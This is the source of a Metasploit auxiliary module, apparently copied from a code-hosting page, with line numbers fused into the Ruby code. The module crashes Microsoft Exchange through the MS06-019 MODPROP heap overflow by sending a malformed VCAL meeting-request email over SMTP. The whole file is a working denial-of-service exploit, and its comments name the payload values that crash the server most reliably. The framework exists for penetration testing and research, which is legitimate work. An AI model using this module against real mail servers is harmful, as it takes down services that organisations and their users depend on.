Path: blob/master/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Smtp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'MS06-019 Exchange MODPROP Heap Overflow',14'Description' => %q{15This module triggers a heap overflow vulnerability in MS16Exchange that occurs when multiple malformed MODPROP values17occur in a VCAL request.18},19'Author' => [ 'pusscat' ],20'License' => MSF_LICENSE,21'References' => [22[ 'BID', '17908'],23[ 'CVE', '2006-0027'],24[ 'MSB', 'MS06-019'],2526],27'DisclosureDate' => '2004-11-12',28'Notes' => {29'Stability' => [CRASH_SERVICE_DOWN],30'SideEffects' => [],31'Reliability' => []32}33)34)3536register_options(37[38OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains'])39]40)41end4243#44# This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class45#46def run47connect_login4849modprops = [50'attendee', 'categories', 'class', 'created', 'description',51'dtstamp', 'duration', 'last-modified',52'location', 'organizer', 'priority', 'recurrence-id', 'sequence',53'status', 'summary', 'transp', 'uid'54]5556# modprops = ['dtstamp']5758modpropshort = ''59modpropbusted = ''60modnum = rand(3)61621.upto(modnum) do63nextprop = rand(modprops.size)64modpropshort << modprops[nextprop] + ','65modpropbusted << modprops[nextprop].upcase + ":\r\n"66end6768modpropshort = 'dtstamp,'69modpropbusted = "DTSTAMP:\r\n"70modnum = modnum + 1 + rand(3)71modproplong = modpropshort721.upto(modnum) do73modproplong << modprops[rand(modprops.size)] + ','74end7576boundary = Rex::Text.rand_text_alphanumeric(8) + '.' + Rex::Text.rand_text_alphanumeric(8)7778# Really, the randomization above only crashes /sometimes/ - it's MUCH more79# reliable, and gives crashes in better spots of you use these modprops:8081modpropshort = 'dtstamp,'82modproplong = 'dtstamp, dtstamp,'83modpropbusted = "DTSTAMP:\r\n"8485mail = "From: #{datastore['MAILFROM']}\r\n"86mail << "To: #{datastore['MAILTO']}\r\n"87mail << "Subject: #{datastore['SUBJECT']}\r\n"88mail << "Content-class: urn:content-classes:calendarmessage\r\n"89mail << "MIME-Version: 1.0\r\n"90mail << "Content-Type: multipart/alternative;boundary=\"#{boundary}\"\r\n"91mail << "X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0\r\n"92mail << "\r\n"93mail << "--#{boundary}\r\n"94mail << "Content-class: urn:content-classes:calendarmessage\r\n"95mail << "Content-Type: text/calendar; method=REQUEST; name=\"meeting.ics\"\r\n"96mail << "Content-Transfer-Encoding: 8bit\r\n"97mail << "\r\n"98mail << "BEGIN:VCALENDAR\r\n"99mail << "BEGIN:VEVENT\r\n"100mail << "X-MICROSOFT-CDO-MODPROPS:#{modpropshort.chop}\r\n"101mail << modpropbusted102mail << "END:VEVENT\r\n"103mail << "BEGIN:VEVENT\r\n"104mail << "X-MICROSOFT-CDO-MODPROPS:#{modproplong.chop}\r\n"105mail << "END:VEVENT\r\n"106mail << "END:VCALENDAR\r\n"107mail << "\r\n--#{boundary}\r\n"108mail << "\r\n.\r\n"109110print_status('Sending message...')111sock.put(mail)112sock.put("QUIT\r\n")113print '<< ' + (sock.get_once || '')114disconnect115end116end117118119